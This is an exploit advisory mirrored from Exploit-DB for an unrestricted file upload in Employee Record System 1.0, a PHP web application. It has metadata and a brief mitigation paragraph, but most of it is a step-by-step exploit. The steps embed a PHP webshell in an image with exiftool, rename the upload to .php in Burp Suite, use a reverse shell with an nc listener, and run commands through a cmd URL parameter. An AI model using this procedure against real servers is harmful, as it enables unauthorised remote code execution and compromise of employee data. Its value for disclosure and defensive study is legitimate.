Employee Record System 1.0 - Unrestricted File Upload to Remote Code Execution

vendor:

Employee Record System

by:

Saeed Bala Ahmed (r0b0tG4nG)

9.8

CVSS

HIGH

Unrestricted File Upload

434

CWE

Product Name: Employee Record System

Affected Version From: Version 1

Affected Version To: Version 1

Patch Exists: NO

Related CWE: N/A

CPE: a:sourcecodester:employee_record_system:1.0

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Parrot OS

2021

Employee Record System 1.0 – Unrestricted File Upload to Remote Code Execution

An unrestricted file upload vulnerability in Employee Record System 1.0 allows an attacker to upload a malicious file, such as a webshell, to the server. This can be exploited to execute arbitrary code on the server, leading to remote code execution. The vulnerability exists in the 'Add Employee' page, where an attacker can upload a malicious file in the 'Upload Employee Photo' and 'Upload Employee ID' fields. The malicious file is then accessible via a direct URL, allowing an attacker to execute arbitrary code on the server.

Mitigation:

Input validation should be used to restrict the types of files that can be uploaded. Additionally, the application should be configured to only allow the upload of files with specific extensions, such as .jpg, .png, etc.

Source

Exploit-DB raw data:

# Exploit Title: Employee Record System 1.0 - Unrestricted File Upload to Remote Code Execution
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
# Date: 2021-01-05
# Vendor Homepage: https://www.sourcecodester.com/php/14588/employee-record-system-phpmysqli-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14588&title=Employee+Record+System+in+PHP%2FMySQLi+with+Full+Source+Code
# Affected Version: Version 1
# Tested on: Parrot OS

Step 1: Log in to the CMS with any valid user credentials.
Step 2: Click on add Employee.
Step 3: Copy a php webshell from /usr/share/webshells/php/php-reverse-shell.php and rename it to shell.php.jpg or embed a phpshellcode into an image using "exiftool -Comment='<?php system($_GET['cmd']); ?>' r0b0t.jpg, then rename the image to r0b0t.php.jpg
Step 4: Fill in the required details at Add Employee, to Upload Employee Photo, browse select the shell.php.jpg / r0b0t.php.jpg from your computer.
Step 5: Click upload and capture request in burpsuite. In burpsuite, find your uploaded file and rename it to a ".php" extenstion.
-----------------------------32746377659244340001584064316
Content-Disposition: form-data; name="employee_photo"; filename="r0b0t.php"
Content-Type: image/jpeg
------------------------------------------

Step 6: Forward the request in burpsuite and apply same technique to Upload Employee ID.
step 7: Once all webshells/payloads are uploaded in both "Upload Employee Photo" & "Upload Employee ID" fields, click on ADD RECORD to create the record.
Step 8: Navigate to All employees, click on view employee icon, once the page loads, start nc listener, right click on the employee icon, copy the image location and paste that in browser. You will either have a shell in nc listener or a full RCE through the uploaded image (http://localhost/record/uploads/employees_photos/gQZtGSJyYW4oijD_r0b0t.php?cmd=ls)